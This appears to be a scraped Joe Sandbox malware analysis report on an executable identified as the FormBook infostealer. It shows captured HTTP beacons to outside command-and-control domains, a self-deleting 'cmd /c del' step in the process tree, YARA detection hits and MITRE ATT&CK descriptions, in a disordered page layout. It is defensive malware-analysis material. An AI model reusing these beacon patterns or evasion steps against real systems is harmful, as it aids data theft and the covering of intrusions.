html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49795	45.144.154.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 31, 2022 09:04:56.470235109 CET	10406	OUT	GET /ndf8/?r48X=L//HOLm6eVpZsv6wHqdDx/pXwzG7nIq0F46X6LZeKEBinnMUqCblDJYQdI12cZc6z1z4&ihe4W=5jMxZX HTTP/1.1 Host: www.zenginbilgiler.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 31, 2022 09:04:56.521265030 CET	10407	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 683 date: Mon, 31 Jan 2022 08:04:56 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: http://www.zenginbilgiler.com/cgi-sys/suspendedpage.cgi?r48X=L//HOLm6eVpZsv6wHqdDx/pXwzG7nIq0F46X6LZeKEBinnMUqCblDJYQdI12cZc6z1z4&ihe4W=5jMxZX Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49796	103.224.182.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 31, 2022 09:05:01.905292988 CET	10408	OUT	GET /ndf8/?r48X=RCeNT3WkEnXVD15B0umhKW1HWEsk0Lwf2Jc1jyix6D3p3K2Ri/EfFXI6896QSMfxSYQR&ihe4W=5jMxZX HTTP/1.1 Host: www.pawastreams.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 31, 2022 09:05:02.097158909 CET	10409	IN	HTTP/1.1 302 Found Date: Mon, 31 Jan 2022 08:05:01 GMT Server: Apache/2.4.25 (Debian) Set-Cookie: __tad=1643616301.7370219; expires=Thu, 29-Jan-2032 08:05:01 GMT; Max-Age=315360000 Location: http://ww25.pawastreams.com/ndf8/?r48X=RCeNT3WkEnXVD15B0umhKW1HWEsk0Lwf2Jc1jyix6D3p3K2Ri/EfFXI6896QSMfxSYQR&ihe4W=5jMxZX&subid1=20220131-1905-01a8-b202-eacf469a7db3 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49797	54.203.72.218	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 31, 2022 09:05:07.420793056 CET	10409	OUT	GET /ndf8/?r48X=3cYFrCEtfJlcg4ld1aVHN5gMYg5Zt2FExUyTFUcyhukshY2DzeoXaRCbeMAEi8U22TkD&ihe4W=5jMxZX HTTP/1.1 Host: www.bestpicture-toglancetoday.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 31, 2022 09:05:07.743268013 CET	10410	IN	HTTP/1.1 404 Not Found X-Powered-By: Express Content-Type: text/plain; charset=utf-8 Content-Length: 9 ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg" Date: Mon, 31 Jan 2022 08:05:07 GMT Connection: close Server: lighttpd/1.4.54 Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49808	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 31, 2022 09:05:24.281737089 CET	10535	OUT	GET /ndf8/?r48X=ggw9hHOBDDdESRr+AgwRlMKcO473LY4IfLFd6/0WA0ZukpfiF712g3X0dfEv6OyyQaoN&ihe4W=5jMxZX HTTP/1.1 Host: www.partumball.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 31, 2022 09:05:24.398967981 CET	10536	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 31 Jan 2022 08:05:24 GMT Content-Type: text/html Content-Length: 275 ETag: "61f22041-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Statistics

Click to jump to process

Target ID:	2
Start time:	09:03:06
Start date:	31/01/2022
Path:	C:\Users\user\Desktop\tM32bSteJD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tM32bSteJD.exe"
Imagebase:	0x400000
File size:	256442 bytes
MD5 hash:	FE1B3C933234D3A68D7B0722A177BA07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Target ID:	4
Start time:	09:03:08
Start date:	31/01/2022
Path:	C:\Users\user\Desktop\tM32bSteJD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tM32bSteJD.exe"
Imagebase:	0x400000
File size:	256442 bytes
MD5 hash:	FE1B3C933234D3A68D7B0722A177BA07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Target ID:	8
Start time:	09:03:14
Start date:	31/01/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Target ID:	10
Start time:	09:03:37
Start date:	31/01/2022
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autofmt.exe
Imagebase:	0x8b0000
File size:	831488 bytes
MD5 hash:	7FC345F685C2A58283872D851316ACC4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: wscript.exePID: 7024, Parent PID: 3352

General

Target ID:	11
Start time:	09:03:44
Start date:	31/01/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0x3e0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Target ID:	12
Start time:	09:03:49
Start date:	31/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\tM32bSteJD.exe"
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	13
Start time:	09:03:51
Start date:	31/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tM32bSteJD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\iylox8a3f727hx5m5

C:\Users\user\AppData\Local\Temp\nsv6BBE.tmp

C:\Users\user\AppData\Local\Temp\nsv6BBF.tmp\pmtkix.dll

C:\Users\user\AppData\Local\Temp\qebpmeyoat

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
tM32bSteJD.exe